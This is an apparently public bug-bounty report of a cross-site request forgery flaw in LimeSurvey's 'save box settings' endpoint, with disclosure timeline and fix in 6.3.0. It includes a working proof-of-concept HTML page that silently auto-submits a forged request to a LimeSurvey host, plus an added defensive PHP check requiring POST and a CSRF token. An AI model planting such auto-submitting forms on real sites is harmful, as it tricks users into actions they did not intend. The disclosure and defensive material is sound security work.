CSRF in Save Box Settings in limesurvey/limesurvey

Valid

Reported on

Oct 2nd 2023


Description

CSRF in Save Box Settings

Proof of Concept

1. Attacker sends a fake form to the user

<html>
  <body>
    <form action="https://haido456.limesurvey.net/homepageSettings/updateBoxesSettings/boxesbyrow/10/boxesoffset/2">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

2. User clicks, and the home interface is changed

Video PoC

https://drive.google.com/file/d/18y9P7SZuHgNC3uzmD50Xo82Yrmp5V4VS/view?usp=sharing

Impact

Trick users into taking unwanted actions.
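
An added example (not part of the report, and not LimeSurvey's code or its fix) of the server-side checks that reject the request above: the PoC form has no method attribute, so the browser sends a GET, and the handler below requires POST plus a per-session token. The function name, the `csrf_token` field name and the accepted value ranges are assumptions.

```php
<?php
declare(strict_types=1);

/**
 * Added example, not LimeSurvey code. Decides whether a request may change
 * box settings. Parameter names mirror the PoC URL; the token field name
 * "csrf_token" and the value ranges are assumptions.
 */
function checkBoxSettingsRequest(string $method, array $post, string $sessionToken): array
{
    // 1. State changes must not be reachable via GET: a cross-site form,
    //    link or image tag can issue a GET with the victim's cookies.
    if (strtoupper($method) !== 'POST') {
        return ['ok' => false, 'status' => 405, 'reason' => 'POST required'];
    }
    // 2. The body must carry the per-session token, compared in constant time.
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || $sessionToken === '' || !hash_equals($sessionToken, $sent)) {
        return ['ok' => false, 'status' => 400, 'reason' => 'CSRF token invalid'];
    }
    // 3. Settings come from the validated body, not from URL path segments.
    $perRow = filter_var($post['boxesbyrow'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 12]]);
    $offset = filter_var($post['boxesoffset'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 12]]);
    if ($perRow === false || $offset === false) {
        return ['ok' => false, 'status' => 400, 'reason' => 'invalid settings'];
    }
    return ['ok' => true, 'status' => 200, 'boxesbyrow' => $perRow, 'boxesoffset' => $offset];
}

// Constructed sample requests (not captured traffic).
$token = bin2hex(random_bytes(32)); // would live in the user's session
$cases = [
    'PoC-style GET, no token'   => ['GET', []],
    'cross-site POST, no token' => ['POST', ['boxesbyrow' => '10', 'boxesoffset' => '2']],
    'same-site POST with token' => ['POST', ['csrf_token' => $token, 'boxesbyrow' => '10', 'boxesoffset' => '2']],
];
foreach ($cases as $label => [$method, $post]) {
    $r = checkBoxSettingsRequest($method, $post, $token);
    printf("%-28s -> %d %s\n", $label, $r['status'], $r['ok'] ? 'accepted' : $r['reason']);
}
```

Only the third case is accepted; the GET that the PoC page auto-submits is refused before any setting is read.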

We are processing your report and will contact the limesurvey team within 24 hours. 5 months ago
HaiNguyen modified the report
5 months ago
tiborpacalat
5 months ago

Maintainer


Internal tracking number: 19142

We have contacted a member of the limesurvey team and are waiting to hear back 5 months ago
HaiNguyen
4 months ago

Researcher


@tiborpacalat, hi, any new update?

tiborpacalat validated this vulnerability 4 months ago
hainguyen0207 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
tiborpacalat marked this as fixed in 6.3.0+231016 with commit ffb66e 4 months ago
The fix bounty has been dropped
This vulnerability has now been published 4 months ago